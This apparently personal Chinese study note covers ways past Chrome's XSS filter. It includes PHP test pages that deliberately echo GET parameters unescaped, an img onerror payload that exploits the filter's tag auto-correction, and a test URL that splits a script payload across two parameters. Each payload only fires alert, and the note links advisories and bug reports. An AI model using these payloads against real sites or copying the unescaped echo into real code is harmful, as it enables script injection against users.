自己测测吧。
chrome_xss_1

//xss_test.php
<html>
<head></head>
<body>
<?php
echo $_GET['a'];
?>
</body>
<script>
alert(document.getElementsByTagName('body')[0].innerHTML);
</script>
</html>

alert('a')被过滤了。
如果是src=xxx.js引入一个js脚本是不会过滤的,但必须是同源的。
以前有漏洞引用非js文件,可以非同源
chrome_xss_2
chrome11的xss filter存在一个老漏洞:
http://seclists.org/fulldisclosure/2011/May/490
这个老漏洞是利用了chrome xss filter的标签自动修正特性
输入:<img src="noexist" onerror="alert(1);//
而chrome自动将内容修正为:
<img src="noexist" onerror="alert(1);//&lt;/body">
Chrome Version: 10.0.612.3 dev的一个漏洞
https://code.google.com/p/chromium/issues/detail?id=68484



现在的chrome版本

//xss_3.php
<html>
<body>
<br/>
a:<?php echo $_GET['a'] ?>
<br/>chrome_xss_text<br/>b:<?php echo $_GET['b'] ?>
<br/>
</body>
</html>

如果一页面存在有这样两处xss,那么可以这样
chrome_xss_3
在线测试页面:

http://securitee.tk/files/chrome_xss.php?a=%3Cscript%3Ealert(document.domain);t='&b=';%3C/script%3E

上面的链接是根据这个老外的小改了一下,在当前chrome版本 25.0.1364.97下就能成功了
https://code.google.com/p/chromium/issues/detail?id=96616
存一个链接以后慢慢学习
https://blog.whitehatsec.com/vote-now-top-ten-web-hacking-techniques-of-2011/